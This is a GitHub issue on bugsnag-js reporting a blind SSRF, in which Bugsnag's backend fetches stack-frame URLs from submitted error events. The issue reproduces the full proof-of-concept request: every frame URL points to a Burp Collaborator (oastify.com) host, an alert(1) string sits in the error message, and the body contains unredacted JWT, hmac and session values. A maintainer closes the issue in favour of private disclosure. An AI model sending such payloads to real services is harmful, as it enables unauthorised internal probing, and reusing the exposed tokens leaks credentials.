bugsnag/bugsnag-js

Blind (out-of-band) SSRF via stack-frame `file` URLs in event payloads sent to notify.bugsnag.com (bugsnag-js notifier)

yahyaayman55 opened this issue · 1 comments

Description:
While testing on the Shopify bug bounty program I noticed a request sent by the page to Host: notify.bugsnag.com, the ingestion endpoint used by the bugsnag-js notifier.
If you replace every stack-frame `file` URL in that request's JSON body with a Burp Collaborator hostname, the Collaborator receives DNS and HTTP interactions originating from a Bugsnag server. The Bugsnag backend is therefore fetching attacker-controlled URLs taken from the submitted payload; because no response body is returned to the submitter, this is a blind SSRF. The page does not show which backend component performs the fetch (presumably something that resolves frame URLs, e.g. for source maps), so that part is inferred. Note also that the browser notifier sends the API key in the clear in the `Bugsnag-Api-Key` header, so any client that has loaded the page can submit crafted events; the key is not a meaningful authentication boundary for this issue.

PoC screenshot (`ssrf1`, not reproduced here): the Collaborator client showing the DNS and HTTP interactions from the Bugsnag server.

Vulnerable request with the SSRF payload. As shown below, every stack-frame `file` value has been replaced with the Collaborator host, and the API key has been redacted. Note that the body still contains the `id_token` JWT and the `session`/`hmac` values of the quickstart test shop (which appears to be the reporter's own); these should also be redacted before a capture like this is shared.

POST / HTTP/2
Host: notify.bugsnag.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Bugsnag-Api-Key: ***
Bugsnag-Payload-Version: 4
Bugsnag-Sent-At: 2024-04-21T05:48:28.383Z
Content-Length: 8166
Origin: https://arrive-server.shopifycloud.com/
Referer: https://arrive-server.shopifycloud.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers

{"apiKey":"***","notifier":{"name":"Bugsnag JavaScript","version":"7.22.7","url":"https://github.com/bugsnag/bugsnag-js"},"events":[{"payloadVersion":"4","exceptions":[{"errorClass":"SyntaxError","errorMessage":"Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tXC9hZG1pbiIsImRlc3QiOiJodHRwczpcL1wvcXVpY2tzdGFydC1iNjUxZWE2OS5teXNob3BpZnkuY29tIiwiYXVkIjoiNTMyODYxNjAxYWE4OWE1ZTcwZjVkNTZkMDc1ZTgyYWMiLCJzdWIiOiI4MzI5ODM4NjExNiIsImV4cCI6MTcxMzY3MDQ2OCwibmJmIjoxNzEzNjcwNDA4LCJpYXQiOjE3MTM2NzA0MDgsImp0aSI6ImY5MzQ0MGYxLTgzYTgtNGM1OS04M2Y2LWYyNjcxMDUwNDFkNiIsInNpZCI6IjFlMzA0MTI1LTg3ZmMtNDY1Ny04OGQxLTFiMzhkM2QxZjVmYSIsInNpZyI6IjNlMjgwMjU4MTVlOWFlMmFkNDRhMTZkOWE0OTdiZjU5NWYwYjQzM2Q5ZTcwYjVmZGJmYTNjNzU2MWEwNjEwZmUifQ.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid 
URL.","type":"browserjs","stacktrace":[{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"jr.redirect","lineNumber":1,"columnNumber":147487},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"e.createClientApp/</A<","lineNumber":1,"columnNumber":151989},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"e.createClientApp/<","lineNumber":1,"columnNumber":152004},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/index-74d346a3.js","method":"O","lineNumber":1,"columnNumber":150890},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/merchant-67daf024.js","method":"t.default/l<","lineNumber":1,"columnNumber":42824},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"useMemo","lineNumber":20,"columnNumber":69065},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"r.useMemo","lineNumber":1,"columnNumber":6453},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/merchant-67daf024.js","method":"t.default","lineNumber":1,"columnNumber":42795},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"fu","lineNumber":20,"columnNumber":62757},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"fs","lineNumber":20,"columnNumber":119293},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"uc",
"lineNumber":20,"columnNumber":108532},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"ac","lineNumber":20,"columnNumber":108460},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"lc","lineNumber":20,"columnNumber":108321},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"qs","lineNumber":20,"columnNumber":105156},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"Qs","lineNumber":20,"columnNumber":103711},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"w","lineNumber":11,"columnNumber":1375},{"file":"https://k5qp4y3l7e3fkbnzskj03yctbkhb54tt.oastify.com/shopifycloud/arrive-server/vite/assets/jsx-runtime-40a9b028.js","method":"z","lineNumber":11,"columnNumber":1906}],"message":"Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid URL."}],"severity":"error","unhandled":true,"severityReason":{"type":"unhandledException"},"app":{"releaseStage":"production","version":"61d14dfdca0d1c1e6418323c0d16d8c669d3b03e","type":"shop-channel","duration":54},"device":{"locale":"en-US","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 
Firefox/124.0","orientation":"landscape-primary","id":"clv93xro600002a628difgylk","time":"2024-04-21T05:48:28.382Z"},"request":{"url":"https://arrive-server.shopifycloud.com/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=quickstart-b651ea69.myshopify.com&timestamp=1713670408"},"breadcrumbs":[{"type":"state","name":"Bugsnag loaded","timestamp":"2024-04-21T05:48:28.375Z","metaData":{}},{"type":"log","name":"Console output","timestamp":"2024-04-21T05:48:28.377Z","metaData":{"severity":"debug","[0]":"[bugsnag]","[1]":"Loaded!"}},{"type":"log","name":"Console output","timestamp":"2024-04-21T05:48:28.377Z","metaData":{"severity":"error","[0]":"SyntaxError: Location.assign: 'https://javascript:alert(1)/apps/532861601aa89a5e70f5d56d075e82ac/merchant/?embedded=1&hmac=7508e4488151d3ecb2282ddad485d265804ec0b4bdf976ee8bdfb85148922c50&host=amF2YXNjcmlwdDphbGVydCgxKQ==&id_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.1N5oMbcXThL3Ij8JIyMS_xtzI--usht7FbmUQfaiHL8&locale=en&session=ad4dacf5d27f97cc182267a7b7759cf89e0abca0e68929434a199c3b318da0c5&shop=[quickstart-b651ea69.myshopify.com](http://quickstart-b651ea69.myshopify.com/)&timestamp=1713670408' is not a valid URL."}}],"context":"/merchant/","metaData":{},"user":{"name":"quickstart-b651ea69.myshopify.com"},"featureFlags":[]}]}

Hi @yahyaayman55

Thanks for raising this. BugSnag is part of the SmartBear bug bounty program, and we are aware that you have also submitted a report to HackerOne via the SmartBear "Contact Security" page: https://smartbear.com/security/contact-security/

As this has been raised through the appropriate (private) channel, we are going to close this GitHub issue so the details are not discussed publicly before triage. Please feel free to contact us directly at support@bugsnag.com if you have any further questions regarding this.